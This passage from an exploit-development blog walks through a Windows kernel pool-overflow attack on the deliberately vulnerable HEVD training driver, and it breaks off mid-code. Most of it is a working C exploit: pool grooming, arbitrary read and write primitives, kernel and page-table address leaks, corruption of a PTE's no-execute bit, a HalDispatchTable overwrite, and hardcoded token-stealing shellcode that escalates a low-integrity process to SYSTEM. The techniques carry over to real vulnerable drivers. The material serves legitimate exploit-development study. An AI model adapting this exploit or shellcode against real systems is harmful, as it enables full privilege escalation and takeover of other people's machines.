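    DeviceIoControl(driverHandle, 0x0022206B,
                    &helperobjectArray[i], sizeof(helperobjectArray[i]),
                    &helperobjectArray[i], sizeof(helperobjectArray[i]),
                    &bytesReturned, NULL);

    if (placeholder != 0x9090909090909090)
    {
        corruptedIndex = i;     // this object's Name was overwritten by the overflow
        break;
    }
}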

After this, we can use the same primitive previously mentioned, now using the “Set” functionality in HEVD to set the Name member of the targeted corrupted object. This will actually “trick” the driver into overwriting the Name member of the “standalone”/main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, since the corrupted object’s Name member is really the address of that main object. The overwrite dereferences the standalone object, thus allowing for an arbitrary read primitive, since we can later use the “Get” functionality on the main object.

We then can add a “press enter to continue” function to our exploit to pause execution after the main object is printed to the screen, as well as the corrupted object used for grooming that resides within the 5000 objects used for grooming.

We then can take the address 0xffff8e03c8d5c2b0, which is the corrupted object, and inspect it in WinDbg. If all goes well, this address should contain the address of the “main” object.

Comparing the Name member to the previous screenshot in which the exploit with the “press enter to continue” statement is in, we can see that the pool corruption was successful and that the Name member of one of the 5000 objects used for grooming was overwritten!

Now, if we were to use the “Set” functionality of HEVD and supply the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object that was corrupted and also used for grooming, at address 0xffff8e03c8d5c2b0, HEVD would use the value stored in Name, dereference it, and overwrite it. This is because HEVD is expecting one of the pool allocations previously showcased for the Name pointers, which we do not control. Since we have supplied another address, what HEVD will actually do is perform the overwrite, but this time it will overwrite the pointer we supplied, which is another ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Since the first member of one of these objects is Name, what will happen is that HEVD will actually write whatever we supply to the Name member of our main object! Let’s view this in WinDbg.

As our exploit showcased, we are using HEVD+0x2038 in this case. This value should be written to our main object.

As you can see, our main object now has its Name member pointing to HEVD+0x2038, which is a pointer to the kernel! After running the full exploit, we have now obtained the base address of HEVD from the previous exploit, and now the base of the kernel via an arbitrary read by way of pool overflow - all from low integrity!

The beauty of this technique of leveraging two objects should be clear now - we do not have to constantly perform overflows of objects in order to perform exploitation. We can now just simply use the main object to read!

Our exploitation technique will be to corrupt the page table entry of the memory page our shellcode will eventually reside in. If you are not familiar with this technique, I have two blogs written on the subject, plus one about memory paging. You can find them here: one, two, and three.

For our purposes, we will need to arbitrarily read the following items:

  1. nt!MiGetPteAddress+0x13 - this contains the base of the PTEs needed for calculations
  2. PTE bits that make up the shellcode page
  3. [nt!HalDispatchTable+0x8] - used to execute our shellcode. We first need to preserve this address by reading it to ensure exploit stability

Let’s add a routine to address the first issue, reading the base of the page table entries. We can calculate the offset to the function MiGetPteAddress+0x13 and then use our arbitrary read primitive.

Leveraging the exact same method as before, we can see we have defeated page table randomization and have the base of the page table entries in hand!

The next step is to obtain the PTE bits that make up the shellcode page. We will eventually write our shellcode to KUSER_SHARED_DATA+0x800 in kernel mode, which is at the static address of 0xfffff78000000800. We can instrument the routine to obtain this information in C.
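For reference, the calculation itself, as used later in the full exploit (pteBase being the value leaked from nt!MiGetPteAddress+0x13):

// Derive the virtual address of the PTE that maps KUSER_SHARED_DATA+0x800
unsigned long long shellcodePage = 0xfffff78000000800;                       // KUSER_SHARED_DATA+0x800
unsigned long long shellcodePte  = ((shellcodePage >> 9) & 0x7FFFFFFFF8) + pteBase;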

After running the updated exploit, we can see that we are able to leak the PTE bits for KUSER_SHARED_DATA+0x800, where our shellcode will eventually reside.

Note that the !pte extension in WinDbg was giving me trouble, so from the debuggee machine I ran WinDbg “classic” with local kernel debugging (lkd) to show the contents of !pte. Notice the actual virtual address of the PTE has changed, but the contents of the PTE bits are the same. This is due to rebooting the machine and kASLR kicking in. The WinDbg “classic” screenshot is just meant to outline the PTE contents.

You can view this previous blog of mine to understand the permissions KUSER_SHARED_DATA has, which are write but no execute. The last item we need is the contents of [nt!HalDispatchTable+0x8].

After executing the updated code, we can see we have preserved the value [nt!HalDispatchTable+0x8].

The last item on the agenda is the write primitive, which is 99 percent identical to the read primitive. After writing our shellcode to kernel mode and then corrupting the PTE of the shellcode page, we will be able to successfully escalate our privileges.

Arbitrary Write Primitive

Leveraging the same concepts from the arbitrary read primitive, we can also arbitrarily overwrite 64-bit pointers! Instead of using the “Get” operation to fetch the dereferenced contents of the Name value specified by the “corrupted” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and return them via the Name value specified by the “main” object, this time we will set the Name value of the “main” object not to a pointer that receives the contents, but to the value we would like to write to memory. In this case, we want to set this value to each QWORD of our shellcode, and set the Name value of the “corrupted” object to KUSER_SHARED_DATA+0x800, incrementing it as we go.
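Here is a condensed sketch of a single 64-bit write, again using placeholder names (corruptedIo/mainIo) that mirror the structures in the full exploit below:

// Condensed sketch: write one QWORD (whatToWrite) to an arbitrary kernel address (whereToWrite)
void arbitraryWrite(HANDLE driverHandle, ARW_HELPER_OBJECT_IO* corruptedIo,
                    ARW_HELPER_OBJECT_IO* mainIo, unsigned long long whereToWrite,
                    unsigned long long whatToWrite)
{
    DWORD bytesReturned = 0;

    // First "Set" (on the corrupted object): redirects the main object's Name to the destination
    corruptedIo->Name = &whereToWrite;
    DeviceIoControl(driverHandle, 0x00222067, corruptedIo, sizeof(*corruptedIo),
                    NULL, 0, &bytesReturned, NULL);

    // Second "Set" (on the main object): the driver dereferences the main object's Name
    // (now the destination address) and copies whatToWrite there
    mainIo->Name = &whatToWrite;
    DeviceIoControl(driverHandle, 0x00222067, mainIo, sizeof(*mainIo),
                    NULL, 0, &bytesReturned, NULL);
}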

From here we can run our updated exploit. Since we have created a loop to automate the writing process, we can see we are able to arbitrarily write the contents of the 9 QWORDS which make up our shellcode to KUSER_SHARED_DATA+0x800!

Awesome! We have now successfully performed the arbitrary write primitive! The next goal is to corrupt the contents of the PTE for the KUSER_SHARED_DATA+0x800 page.

From here we can use WinDbg classic to inspect the PTE before and after the write operation.

Awesome! Our exploit now just needs three more things:

  1. Corrupt [nt!HalDispatchTable+0x8] to point to KUSER_SHARED_DATA+0x800
  2. Invoke ntdll!NtQueryIntervalProfile, which will perform the transition to kernel mode to invoke [nt!HalDispatchTable+0x8], thus executing our shellcode
  3. Restore [nt!HalDispatchTable+0x8] with the arbitrary write primitive

Let’s update our exploit code to perform step one.

After executing the updated code, we can see that we have successfully overwritten nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 - which contains our shellcode!

Next, we can add the routine to dynamically resolve ntdll!NtQueryIntervalProfile, invoke it, and then restore [nt!HalDispatchTable+0x8].
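That routine boils down to resolving ntdll!NtQueryIntervalProfile at runtime and calling it with a bogus profile source, exactly as the full exploit below does:

// Function pointer type for ntdll!NtQueryIntervalProfile (NTSTATUS comes from winternl.h)
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(ULONG ProfileSource, PULONG Interval);

NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
    GetModuleHandle(TEXT("ntdll.dll")), "NtQueryIntervalProfile");

// A bogus profile source forces the kernel down the path that calls [nt!HalDispatchTable+0x8],
// which now points to our shellcode at KUSER_SHARED_DATA+0x800
ULONG interval = 0;
NtQueryIntervalProfile(0x1234, &interval);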

The final result is a SYSTEM shell from low integrity!

“…Unless We Conquer, As Conquer We Must, As Conquer We Shall.”

Hopefully you, as the reader, found this two-part series on pool corruption useful! As mentioned at the beginning of this post, we must expect mitigations such as VBS and HVCI to be enabled in the future. ROP is still a viable alternative in the kernel due to the current lack of kernel CET (kCET), although I am sure this is subject to change. As such, techniques such as the one outlined in this blog post will eventually be deprecated, leaving us with fewer options for exploitation than we started with. Data-only attacks are always viable, and more novel techniques have been mentioned, such as this tweet sent to me by Dmytro, which talks about leveraging ROP to forge kernel function calls even with VBS/HVCI enabled. As the title of this last section of the blog articulates, where there is a will there is a way - and although the bar will be raised, this is only par for the course with exploit development over the past few years. KPP + VBS + HVCI + kCFG/kXFG + SMEP + DEP + kASLR + kCET and many other mitigations will prove very useful for blocking most exploits. I hope that researchers stay hungry and continue to push the limits of these mitigations to find more novel ways to keep exploit development alive!

Peace, love, and positivity :-).

Here is the final exploit code, which is also available on my GitHub:

// HackSysExtreme Vulnerable Driver: Pool Overflow + Memory Disclosure
// Author: Connor McGarr (@33y0re)

#include <windows.h>
#include <stdio.h>
// winternl.h provides the NTSTATUS definition used by the NtQueryIntervalProfile typedef below
#include <winternl.h>

// typdef an ARW_HELPER_OBJECT_IO struct
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;
} ARW_HELPER_OBJECT_IO, * PARW_HELPER_OBJECT_IO;

// Create a global array of ARW_HELPER_OBJECT_IO objects to manage the groomed pool allocations
ARW_HELPER_OBJECT_IO helperobjectArray[5000] = { 0 };

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Leak the base of HEVD.sys
unsigned long long memLeak(HANDLE driverHandle)
{
    // Array to manage handles opened by CreateEventA
    HANDLE eventObjects[5000];

    // Spray 5000 objects to fill the new page
    for (int i = 0; i < 5000; i++)
    {
        // Create the objects
        HANDLE tempHandle = CreateEventA(
            NULL,
            FALSE,
            FALSE,
            NULL
        );

        // Assign the handles to the array
        eventObjects[i] = tempHandle;
    }

    // Check to see if the first handle is a valid handle
    if (eventObjects[0] == NULL)
    {
        printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());

        return 0x1;
        exit(-1);
    }
    else
    {
        printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

        // Close half of the handles
        for (int i = 0; i < 5000; i += 2)
        {
            BOOL tempHandle1 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle1)
            {
                printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        printf("[+] Poked holes in the new pool page!\n");

        // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
        // kLFH should automatically fill the freed holes with the UAF objects
        DWORD bytesReturned;

        for (int i = 0; i < 2500; i++)
        {
            DeviceIoControl(
                driverHandle,
                0x00222053,
                NULL,
                0,
                NULL,
                0,
                &bytesReturned,
                NULL
            );
        }

        printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

        // Close the rest of the event objects
        for (int i = 1; i <= 5000; i += 2)
        {
            BOOL tempHandle2 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle2)
            {
                printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        // Array to store the buffer (output buffer for DeviceIoControl) and the base address
        unsigned long long outputBuffer[100];
        unsigned long long hevdBase = 0;

        // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
        // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

        for (int i = 0; i <= 100; i++)
        {
            // Return buffer
            DWORD bytesReturned1;

            DeviceIoControl(
                driverHandle,
                0x0022204f,
                NULL,
                0,
                &outputBuffer,
                sizeof(outputBuffer),
                &bytesReturned1,
                NULL
            );

        }

        printf("[+] Successfully triggered the out-of-bounds read!\n");

        // Parse the output
        for (int i = 0; i < 100; i++)
        {
            // Kernel mode address?
            if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
            {
                printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
                printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

                // Store the variable for future usage
                hevdBase = outputBuffer[i] - 0x880CC;

                // Return the value of the base of HEVD
                return hevdBase;
            }
        }

        // If no kernel-mode pointer was found, bail out instead of falling off the end of the function
        printf("[-] Error! Unable to leak a kernel-mode address from HEVD.sys!\n");
        exit(-1);
    }
}

// Function used to fill the holes in pool pages
void fillHoles(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedFill;

    for (int i = 0; i < 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject.Name = &nameValue;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject;
    }

    printf("[+] Sprayed ARW_HELPER_OBJECT_IO objects to fill holes in the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Fill up the new page within the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
void groomPool(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject1 = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue1 = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject1.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedGroom;

    for (int i = 0; i < 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject1.Name = &nameValue1;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject1;
    }

    printf("[+] Filled the new page with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Free every other object in the global array to poke holes for the vulnerable objects
void pokeHoles(HANDLE driverHandle)
{
    // Bytes returned
    DWORD bytesreturnedPoke;

    // Free every other element in the global array managing objects in the new page from grooming
    for (int i = 0; i < 5000; i += 2)
    {
        DeviceIoControl(
            driverHandle,
            0x0022206f,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedPoke,
            NULL
        );
    }

    printf("[+] Poked holes in the NonPagedPoolNx page containing the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Create the main ARW_HELPER_OBJECT_IO
ARW_HELPER_OBJECT_IO createmainObject(HANDLE driverHandle)
{
    // Instantiate an object of type ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO helperObject = { 0 };

    // Set the Length member which corresponds to the amount of memory used to allocate a chunk to store the Name member eventually
    helperObject.Length = 0x8;

    // Bytes returned
    DWORD bytesReturned2;

    // Invoke CreateArbitraryReadWriteHelperObjectNonPagedPoolNx to create the main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
    DeviceIoControl(
        driverHandle,
        0x00222063,
        &helperObject,
        sizeof(helperObject),
        &helperObject,
        sizeof(helperObject),
        &bytesReturned2,
        NULL
    );

    // Parse the output
    printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperObject.HelperObjectAddress);
    printf("[+] PARW_HELPER_OBJECT_IO->Name: 0x%p\n", helperObject.Name);
    printf("[+] PARW_HELPER_OBJECT_IO->Length: 0x%zu\n", helperObject.Length);

    return helperObject;
}

// Read/write primitive
void readwritePrimitive(HANDLE driverHandle)
{
    // Store the value of the base of HEVD
    unsigned long long hevdBase = memLeak(driverHandle);

    // Store the main ARW_HELOPER_OBJECT
    ARW_HELPER_OBJECT_IO mainObject = createmainObject(driverHandle);

    // Fill the holes
    fillHoles(driverHandle);

    // Groom the pool
    groomPool(driverHandle);

    // Poke holes
    pokeHoles(driverHandle);

    // Use buffer overflow to take "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name value (managed by ARW_HELPER_OBJECT_IO.Name) to overwrite any of the groomed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name values
    // Create a buffer that first fills up the vulnerable chunk of 0x10 (16) bytes
    unsigned long long vulnBuffer[5];
    vulnBuffer[0] = 0x4141414141414141;
    vulnBuffer[1] = 0x4141414141414141;

    // Hardcode the _POOL_HEADER value for a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object
    vulnBuffer[2] = 0x6b63614802020000;

    // Padding
    vulnBuffer[3] = 0x4141414141414141;

    // Overwrite any of the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name member with the address of the "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX (via ARW_HELPER_OBJECT_IO.HelperObjectAddress)
    vulnBuffer[4] = (unsigned long long)mainObject.HelperObjectAddress;

    // Bytes returned
    DWORD bytesreturnedOverflow;
    DWORD bytesreturnedreadPrimtitve;

    printf("[+] Triggering the out-of-bounds-write via pool overflow!\n");

    // Trigger the pool overflow
    DeviceIoControl(
        driverHandle,
        0x0022204b,
        &vulnBuffer,
        sizeof(vulnBuffer),
        &vulnBuffer,
        0x28,
        &bytesreturnedOverflow,
        NULL
    );

    // Find which "groomed" object was overflowed
    int index = 0;
    unsigned long long placeholder = 0x9090909090909090;

    // Loop through every groomed object to find out which Name member was overwritten with the main ARW_HELPER_NON_PAGED_POOL_NX object
    for (int i = 0; i < 5000; i++)
    {
        // The placeholder variable will be overwritten. Get operation will overwrite this variable with the real contents of each object's Name member
        helperobjectArray[i].Name = &placeholder;

        DeviceIoControl(
            driverHandle,
            0x0022206b,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Loop until a Name value other than the original NOPs is found
        if (placeholder != 0x9090909090909090)
        {
            printf("[+] Found the overflowed object overwritten with main ARW_HELPER_NON_PAGED_POOL_NX object!\n");
            printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperobjectArray[i].HelperObjectAddress);

            // Assign the index
            index = i;

            printf("[+] Array index of global array managing groomed objects: %d\n", index);

            // Break the loop
            break;
        }
    }

    // IAT entry from HEVD.sys which points to nt!ExAllocatePoolWithTag
    unsigned long long ntiatLeak = hevdBase + 0x2038;

    // Print update
    printf("[+] Target HEVD.sys address with pointer to ntoskrnl.exe: 0x%llx\n", ntiatLeak);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &ntiatLeak;

    // Set the Name member of the "corrupted" object managed by the global array. The main object is currently set to the Name member of one of the sprayed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX that was corrupted via the pool overflow
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare variable that will receive the address of nt!ExAllocatePoolWithTag and initialize it
    unsigned long long ntPointer = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the ntPointer variable. When the Name member is dereferenced and bubbled back up to user mode, it will overwrite the value of ntPointer
    mainObject.Name = &ntPointer;

    // Perform the "Get" operation on the main object, which should now have the Name member set to the IAT entry from HEVD
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print the pointer to nt!ExAllocatePoolWithTag
    printf("[+] Leaked ntoskrnl.exe pointer! nt!ExAllocatePoolWithTag: 0x%llx\n", ntPointer);

    // Assign a variable the base of the kernel (static offset)
    unsigned long long kernelBase = ntPointer - 0x9b3160;

    // Print the base of the kernel
    printf("[+] ntoskrnl.exe base address: 0x%llx\n", kernelBase);

    // Assign a variable with nt!MiGetPteAddress+0x13
    unsigned long long migetpteAddress = kernelBase + 0x222073;

    // Print update
    printf("[+] nt!MiGetPteAddress+0x13: 0x%llx\n", migetpteAddress);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &migetpteAddress;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the base of the PTEs
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the base of the PTEs
    unsigned long long pteBase = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the pteBase variable
    mainObject.Name = &pteBase;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Base of the page table entries: 0x%llx\n", pteBase);

    // Calculate the PTE page for our shellcode in KUSER_SHARED_DATA
    unsigned long long shellcodePte = 0xfffff78000000800 >> 9;
    shellcodePte = shellcodePte & 0x7FFFFFFFF8;
    shellcodePte = shellcodePte + pteBase;

    // Print update
    printf("[+] KUSER_SHARED_DATA+0x800 PTE page: 0x%llx\n", shellcodePte);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &shellcodePte;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the address of the shellcode PTE page
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the PTE bits
    unsigned long long pteBits = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &pteBits;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] PTE bits for shellcode page: %p\n", pteBits);

    // Store nt!HalDispatchTable+0x8
    unsigned long long halTemp = kernelBase + 0xc00a68;

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &halTemp;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the pointer at nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive [nt!HalDispatchTable+0x8]
    unsigned long long halDispatch = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &halDispatch;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Preserved [nt!HalDispatchTable+0x8] value: 0x%llx\n", halDispatch);

    // Arbitrary write primitive

    /*
        ; Windows 10 19H1 x64 Token Stealing Payload
        ; Author Connor McGarr
        [BITS 64]
        _start:
            mov rax, [gs:0x188]       ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]     ; Current process (_EPROCESS)
            mov rbx, rax              ; Copy current process (_EPROCESS) to rbx
        __loop:
            mov rbx, [rbx + 0x448]    ; ActiveProcessLinks
            sub rbx, 0x448            ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x440]    ; UniqueProcessId (PID)
            cmp rcx, 4                ; Compare PID to SYSTEM PID
            jnz __loop                ; Loop until SYSTEM PID is found
            mov rcx, [rbx + 0x4b8]    ; SYSTEM token is @ offset _EPROCESS + 0x4b8
            and cl, 0xf0              ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x4b8], rcx    ; Copy SYSTEM token to current process
            xor rax, rax              ; set NTSTATUS STATUS_SUCCESS
            ret                       ; Done!
    */

    // Shellcode
    unsigned long long shellcode[9] = { 0 };
    shellcode[0] = 0x00018825048B4865;
    shellcode[1] = 0x000000B8808B4800;
    shellcode[2] = 0x04489B8B48C38948;
    shellcode[3] = 0x000448EB81480000;
    shellcode[4] = 0x000004408B8B4800;
    shellcode[5] = 0x8B48E57504F98348;
    shellcode[6] = 0xF0E180000004B88B;
    shellcode[7] = 0x48000004B8888948;
    shellcode[8] = 0x0000000000C3C031;

    // Assign the target address to write to the corrupted object
    unsigned long long kusersharedData = 0xfffff78000000800;

    // Create a "counter" for writing the array of shellcode
    int counter = 0;

    // For loop to write the shellcode
    for (int i = 0; i < 9; i++)
    {
        // Setting the corrupted object to KUSER_SHARED_DATA+0x800 incrementally 9 times, since our shellcode is 9 QWORDS
        // kusersharedData variable, managing the current address of KUSER_SHARED_DATA+0x800, is incremented by 0x8 at the end of each iteration of the loop
        helperobjectArray[index].Name = &kusersharedData;

        // Setting the Name member of the main object to specify what we would like to write
        mainObject.Name = &shellcode[counter];

        // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800, incrementally
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &helperobjectArray[index],
            sizeof(helperobjectArray[index]),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Perform the arbitrary write via "set" to overwrite each QWORD of KUSER_SHARED_DATA+0x800 until our shellcode is written
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &mainObject,
            sizeof(mainObject),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Increase the counter
        counter++;

        // Move to the next QWORD of KUSER_SHARED_DATA+0x800
        kusersharedData += 0x8;
    }

    // Print update
    printf("[+] Successfully wrote the shellcode to KUSER_SHARED_DATA+0x800!\n");

    // Taint the PTE contents to corrupt the NX bit in KUSER_SHARED_DATA+0x800
    unsigned long long taintedBits = pteBits & 0x0FFFFFFFFFFFFFFF;

    // Print update
    printf("[+] Tainted PTE contents: %p\n", taintedBits);

    // Leverage the arbitrary write primitive to corrupt the PTE contents

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &shellcodePte;

    // Specify what we would like to write (the tainted PTE contents)
    mainObject.Name = &taintedBits;

    // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800's PTE virtual address
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted the PTE of KUSER_SHARED_DATA+0x800! This region should now be marked as RWX!\n");

    // Leverage the arbitrary write primitive to overwrite nt!HalDispatchTable+0x8

    // Reset kusersharedData
    kusersharedData = 0xfffff78000000800;

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of KUSER_SHARED_DATA+0x800)
    mainObject.Name = &kusersharedData;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted [nt!HalDispatchTable+0x8]!\n");

    // Locating nt!NtQueryIntervalProfile
    NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
        GetModuleHandle(
            TEXT("ntdll.dll")),
